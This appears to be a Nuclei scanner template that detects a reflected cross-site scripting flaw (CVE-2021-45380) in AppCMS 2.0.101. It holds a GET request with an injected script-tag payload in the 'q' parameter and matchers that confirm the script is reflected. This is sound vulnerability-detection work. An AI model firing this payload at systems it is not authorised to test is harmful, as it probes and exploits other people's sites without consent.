nuclei-templates/cves/2021/CVE-2021-45380.yaml

32 lines
714 B
YAML
Raw Normal View History

2022-01-27 18:40:43 +00:00
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-45380
tags: cve,cve2021,appcms,xss
requests:
- method: GET
path:
- '{{BaseURL}}/templates/m/inc_head.php?q="><script>alert(1337)</script>'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(1337)</script>'
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200